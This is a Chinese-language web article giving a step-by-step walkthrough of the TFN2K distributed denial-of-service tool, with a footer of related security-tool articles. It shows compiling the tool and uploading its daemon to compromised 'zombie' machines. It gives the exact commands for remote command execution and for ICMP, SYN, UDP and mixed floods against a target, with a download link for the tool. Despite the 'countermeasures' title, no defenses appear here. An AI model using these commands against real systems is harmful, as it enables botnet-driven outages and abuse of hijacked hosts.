tfn2k使用方法和對策(2)
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 22:12:16 作者:佚名
我要評論

tfn2k使用方法和對策(2) 作者:佳佳 佳佳繼續(xù)上一次的文章,這一次是攻擊測試。 測試環(huán)境: 共有5臺機(jī)器,佳佳是在五臺redhat linux6.2上測試的。 192.168.111.1 192.168.111.2 192.168.111.3
tfn2k使用方法和對策(2) 作者:佳佳 佳佳繼續(xù)上一次的文章,這一次是攻擊測試。 測試環(huán)境: 共有5臺機(jī)器,佳佳是在五臺redhat linux6.2上測試的。 192.168.111.1 192.168.111.2 192.168.111.3 192.168.111.55 192.168.111.88 測試目的:?????(感受一下yahoo怎么被攻擊的) 簡要介紹: 我們的測試目的是用192.168.111.55指揮192.168.111.1,192.168.111.2,192.168.111.3 三臺機(jī)器對192.168.111.88發(fā)動攻擊。(實(shí)際攻擊中就不止三臺了。) 因此我們的步驟如下: 0。黑客攻擊時事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55這四臺機(jī)器。也就是我們俗稱的“肉雞”。 1。編譯代碼。 2。在192.168.111.1,192.168.111.2,192.168.111.3上安裝td。 3。在192.168.111.55安裝tfn。 4。由192.168.111.55指揮192.168.111.1,192.168.111.2,192.168.111.3 對192.168.111.88發(fā)動攻擊。 5。攻擊結(jié)束。 詳細(xì)步驟: 0。黑客攻擊時事先要控制192.168.111.1,192.168.111.2,192.168.111.3,192.168.111.55這四臺機(jī)器?!? 這一步我就不說了,大家一定有辦法。。。 1。編譯代碼。 假設(shè)在192.168.112.55上。。。 首先一定要有root權(quán)限 $su # 解開文件: #tar zxvf tfn2k.tgz #cd tfn2k 如果你不是linux或者bsd請修改src下的Makefile文件。(有一網(wǎng)友問佳佳,solaris為什么不行。如果你修改了Makefile,把linux改成了solaris仍然不行,佳佳也不知道了,因?yàn)榧鸭褯]有solaris的測試環(huán)境。) #make make過程中會讓你輸入一個密碼,8--32位的。那就輸入一個吧,將來tfn和td聯(lián)系時需要這個密碼。我輸入的是:aaaabbbb make完成你會發(fā)現(xiàn),多了兩個可執(zhí)行文件:tfn,td 2。在192.168.111.1,192.168.111.2,192.168.111.3上安裝td。 #ftp 192.168.111.1 ftp>bin fpt>put td ftp>by ftp的具體步驟我就不說了,大家一定都知道。 同樣方法:ftp 192.168.111.2 ftp 192.168.111.3 然后在分別在192.168.111.1,192.168.111.2,192.168.111.3上 #./td 注意一定要有root權(quán)限,否則無法運(yùn)行。 3。在192.168.111.55安裝tfn。 由于我們是在192.168.111.55上編譯的,tfn就已經(jīng)在了。 4。由192.168.111.55指揮192.168.111.1,192.168.111.2,192.168.111.3對192.168.111.88發(fā)動攻擊。 好了,我們終于完成了準(zhǔn)備工作,攻擊可以開始了。。。 我現(xiàn)在在192.168.111.55的/tfn2k/目錄下。。。 我們需要編輯一個文件列表。 #vi hosts.txt 文件第一行輸入:192.168.111.1 文件第二行輸入:192.168.111.2 文件第三行輸入:192.168.111.3 這就是控制文件列表。 然后我們測試一下連接。 在192.168.111.55上。。。 下面的命令意思是:在hosts.txt文件中的機(jī)器上執(zhí)行遠(yuǎn)程命令“mkdir jjgirl”,其中-c 10表示執(zhí)行遠(yuǎn)程命令。執(zhí)行完這個命令就會在那三臺機(jī)器上都建立jjgirl目錄。當(dāng)然你可以隨便執(zhí)行其他的命令。 #./tfn -f hosts.txt -c 10 -i "mkdir jjgirl" Protocol : random Source IP : random Client input : list Command : execute remote command Password verification:?。ㄟ@時我們輸入密碼:aaaabbbb) Sending out packets: . 好了,完成。 然后我們在192.168.111.1上執(zhí)行: #find / -name jjgirl -print 好,找到了。說明我們連接成功。。。 下面開始正式攻擊了。。。 你可以在192.168.111.1上: #./ntop 運(yùn)行ntop查看流量。 先來ICMP攻擊 #./tfn -f hosts.txt -c 6 -i 192.168.111.88(十分鐘,192.168.111.88就死機(jī)了) 重啟,接著測試。。。 SYN/TCP攻擊: #./tfn -f hosts.txt -c 5 -i 192.168.111.88 -p 80 UDP攻擊: #./tfn -f hosts.txt -c 4 -i 192.168.111.88 ICMP/TCP/UDP輪流攻擊: #./tfn -f hosts.txt -c 8 -i 192.168.111.88 5。攻擊結(jié)束 如果我們想停止攻擊: #./tfn -f host.txt -c 0 實(shí)際tfn還有許多攻擊選項(xiàng),大家可以再回頭看我的第一篇文章,看一下-c后面的11個選項(xiàng)。 整個測試結(jié)束。由于我是在局域網(wǎng)測試速度比較快。實(shí)際對yahoo等攻擊時至少有幾十臺機(jī)器吧。 好了,下一篇文章主要分析tfn的源代碼,有興趣的同學(xué)接著等。。。 jjgirl 10.29.2000 jjgirl@363.net http://jjgirl.yeah.net 下載地址: http://darknet.evilnerds.org/dos/ddos/tfn2k.tgz
相關(guān)文章
SQLMap簡介及簡單應(yīng)用實(shí)例圖文詳解
一個自動化的SQL注入工具,其主要功能是掃描、發(fā)現(xiàn)并利用給定URL的SQL注入漏洞,內(nèi)置了很多繞過插件,支持的數(shù)據(jù)庫是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server2023-02-04- Nmap是一款網(wǎng)絡(luò)掃描和主機(jī)檢測的非常有用的工具。Nmap是不局限于僅僅收集信息和枚舉,同時可以用來作為一個漏洞探測器或安全掃描器。它可以適用于winodws,linux,mac等操作2019-03-16
SQLMAP注入檢查方法 11種常見SQLMAP使用方法詳解
sqlmap也是滲透中常用的一個注入工具,其實(shí)在注入工具方面,很多人都是通過這個工具實(shí)施的檢測與注入,對于我們從事安全防御的人來說,一定要引起注意,一般的程序員寫的代2018-08-16- 這篇文章主要介紹了lcx用法之心得總結(jié),需要的朋友可以參考下2017-09-06
lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢)
這篇文章主要介紹了lcx端口轉(zhuǎn)發(fā)詳細(xì)介紹及使用方法(lcx內(nèi)網(wǎng)轉(zhuǎn)發(fā)姿勢),需要的朋友可以參考下2017-09-06- 這是我們的Nmap備忘單的第四部分,本文中我們將討論更多東西關(guān)于掃描防火墻,IDS / IPS 逃逸,Web服務(wù)器滲透測試等。在此之前,我們應(yīng)該了解一下防火墻的一些基礎(chǔ)知識以便2016-12-27
- 眾所周知NMAP是經(jīng)常用來進(jìn)行端口發(fā)現(xiàn)、端口識別。除此之外我們還可以通過NMAP的NSE腳本做很多事情,比如郵件指紋識別,檢索WHOIS記錄,使用UDP服務(wù)等2016-12-27
- 這是我們的第二期NMAP備忘單,基本上,我們將討論一些高級NMAP掃描的技術(shù),我們將進(jìn)行一個中間人攻擊(MITM)。現(xiàn)在,游戲開始了2016-12-27
- nmap是一個網(wǎng)絡(luò)連接端掃描軟件,用來掃描網(wǎng)上電腦開放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運(yùn)行在哪些連接端,并且推斷計(jì)算機(jī)運(yùn)行哪個操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)2016-12-27
網(wǎng)絡(luò)漏洞掃描工具Acunetix Web Vulnerability Scanner(AWVS)使用介紹
Acunetix Web Vulnerability Scanner(簡稱AWVS)是一款知名的網(wǎng)絡(luò)漏洞掃描工具,它通過網(wǎng)絡(luò)爬蟲測試你的網(wǎng)站安全,檢測流行安全漏洞。倫敦時間2015年6月24日,官方發(fā)布了2016-09-28